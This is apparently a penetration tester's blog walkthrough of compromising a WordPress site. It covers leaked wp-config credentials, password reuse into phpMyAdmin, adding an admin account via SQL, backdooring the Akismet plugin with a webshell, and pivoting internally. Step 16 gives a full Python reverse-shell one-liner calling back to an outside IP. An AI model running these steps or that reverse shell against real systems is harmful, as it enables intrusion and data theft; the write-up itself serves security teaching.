COMPROMISING A WORDPRESS SITE AND PIVOTING TO THE INTERNAL NETWORK

PIVOTING TO THE INTERNAL NETWORK
PIVOTING TO THE INTERNAL NETWORK

A few months ago I ran into WordPress on a penetration test. It was a generic web application security assessment, but in this case, I was able to compromise the server and most noteworthy to do pivoting thru the internal network. I thought I’d take the compromise walk-through and turn it into a blog post for you guys today. Therefore, let’s get started.

Although I ran other vulnerability scanners (Nessus, OpenVAS, HP Web Inspect) against the target website during the pentest, it was Acunetix that gave me the vulnerability that would become the proverbial first domino. What a cute little gem.

COMPROMISING WORDPRESS

The scanner found a wp_config file which is usually not viewable externally. Probably, there was an issue while the developer or system administrator was working on the server. Maybe, he or she got disconnected from the server while editing the file and that caused the text editor (vi for example) to create a backup file called wp_config~ Wow – can you believe the scanner even found this?

Step 1: Running the Acunetix vulnerability scanner

PIVOTING

Additionally, the Acunetix web vulnerability scanner identified the backup of a configuration file that contained database passwords located at http://www.targetcompany.com/blog/wp-config.php~

// ** MySQL settings – You can get this info from your web host ** //

/** The name of the database for WordPress */

define(‘DB_NAME’, ‘targetcompany_blog’);

/** MySQL database username */

define(‘DB_USER’, ‘targetcompanywp’);

/** MySQL database password */

define(‘DB_PASSWORD’, ‘weakpassword123’);

Step 2: Database port is not remotely accessible so look for phpMyAdmin

Although I had database credentials, I had noticed in my scan data from the other vulnerability scanners that the target server was behind a Cisco ASA Firewall and the database port 3306 was not externally accessible. As a result, I couldn’t connect to the database directly because of the firewall not allowing access to the MySQL database port 3306.

It’s very common for webmasters to use a web-based tool such as phpMyAdmin to administer the database. Luckily for me, the targetcompany is running phpMyAdmin. Since I have database passwords, I guessed that the password for the targetcompanywp account which was weakpassword123 could also be the same password for the database administrative level account named root, and I was correct – it worked!

Access to the phpMyAdmin page is here:

http://targetcompany.com/phpmyadmin/

phpMyAdmin

Step 3: Credentials worked

The password weakpassword123 worked for the root account, and thus, I successfully logged in to phpMyAdmin.

1b

Step 4: View all of the databases on the server

Here I see the names of the other databases on the server.

· targetcompany

· targetcompany_blog

· white_papers

1c

Step 5: View the users and their respective privilege levels

Next, I have moved on to the privileges tab to see what level of privileges that each user has. I hit the jackpot by being the root user. Most of all, I have ‘ALL PRIVILEGES’

1d

 

Step 6: I can export all of the databases

If the goal of the attacker is to steal as much as possible, then the export option would, therefore, be the best way to go.

NOTE: This export option did NOT get executed in this engagement. Remember guys – we are pentesters – NOT hackers. As a result, the last thing you want to do as a pentester is actually to possess a customer’s business critical data. Proving you can access data is one thing, but staying on the safe side and just proving that you can get there – that’s usually all a customer needs to see to be happy with your work.

1e

Step 7: Usernames and passwords

Afterward, I switched to the user’s table in the targetcompany database. Here, I see that the passwords for ALL of the customers are stored in clear text. Under those circumstances, I had to let the client know that is not a good idea.

1f

 

..and more usernames and passwords

1g

again, more usernames and passwords

1h

and again more usernames and passwords

1i

 

Step 8: Looking at the MySQL database

I switched to the user table in the MySQL database. I see here that WordPress has hashed passwords. The database has hashed passwords too.

1j

 

 

Step 9: Attacking WordPress

I switched to the wp_users table in the targetcompany_blog database. I see here that WordPress has properly hashed and salted passwords.

1k

 

Step 10: Create a privileged account in wordpress

Here I am creating a privileged account named joe_strategicsec in WordPress. Creating the account is a multi-step process which you will see in the following screenshots.

1l

After filling out the menu items required to the create the account you’ll see the SQL statement execute.

1m

 

Then after filling out the meta_key field menu item ‘wp_capabilities’ required to set the privilege level of the account you just created then you’ll see the SQL statement execute.

1n

 

1o

 

After filling out the next meta_key field menu item ‘wp_user_level’ required to set the privilege level of the account you just created then you’ll see the SQL statement execute.

1p

 

1q

 

Step 11: Leveraging WordPress access

I can now see the joe_strategicsec account that gets created in the WordPress database. Ok, well it is covered in red but just trust me it’s there.

1r

Step 12: Login with the newly created WordPress account

1s

I have logged in as user joe_strategicsec, so I can now see WordPress Dashboard.

Step 13: WordPress Users

Here I view the WordPress users

1t

 

Step 14: Backdooring a wordpress plugin

I quickly switch to the plugins section and backdoor the Akismet plugin by replacing the source code of one of the pages with a PHP webshell.  The code for a website is pretty easy – it’s just a few lines of PHP.

1u

 

Step 15: Accessing the webshell

One can find the WordPress plugin that got converted to a webshell at:

https://www.targetcompany.com/blog/wp-content/plugins/akismet/akismet.php

To get the Linux server’s internal IP address, you can execute the command:

/sbin/ifconfig

1v

 

To get the Linux server’s version you can execute the command:

cat /etc/issue

1w

To get the Linux server’s kernel version you can execute the command:

uname –a

1x

 

Step 16: Use python to create a reverse shell

Executing system commands via a webshell is often required when attacking web servers, but a real command shell is the preferred access method. Since the target web server is behind a Cisco firewall, I cannot connect to the server directly. I must make the server connect to me since outbound firewall rules are often less restrictive than inbound firewall rules.

Inside of the webshell I can use python to create a reverse connecting network socket that encapsulates the Linux command shell. I do this by typing the following syntax into the webshell (yes I know that there there is no screenshot, but in the webshell just type the following line of python):

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“54.186.248.116”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Now, you’ll see in the screenshot below that I have a netcat listener that receives a connection from the compromised server.

1y

 

Here you’ll see that I do a /sbin/ifconfig and the host has a 192.168 address, so I know that this box is on an internal network.

1z

 

PIVOTING TO THE INTERNAL NETWORK

Step 17: Attack the internal network

Next, I prove that I can attack the internal network with a command-line ping sweep. Since there was no Nmap installed, I wrote a quick for loop to ping the entire subnet.

2a

 

 

Step 18: No nmap installed so went for a command-line ping sweep

2b

At this point, I opted to end this portion of the engagement and notify the client that no further exploitation is required. It would only be a matter of time to achieve root access on this server via local privilege escalation, then install more hacking tools and pivot further into the internal network.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

StormSecurity

IT Security Research and Services

govolution

About assembler and stuff

Astr0baby's not so random thoughts _____ rand() % 100;

ψυχῆς ἰατρεῖον "Hospital of the soul"

Penetration Testing Academy

Education and Advice for Rookies

P.M.C.S.P. Blog

Articles about Physics, Math, Computer Security & Programming and more

Chimera | Security

#YorkshireAnalyst #SIEMJunkie #ALLOPIONIONSAREMYOWN

%d bloggers like this: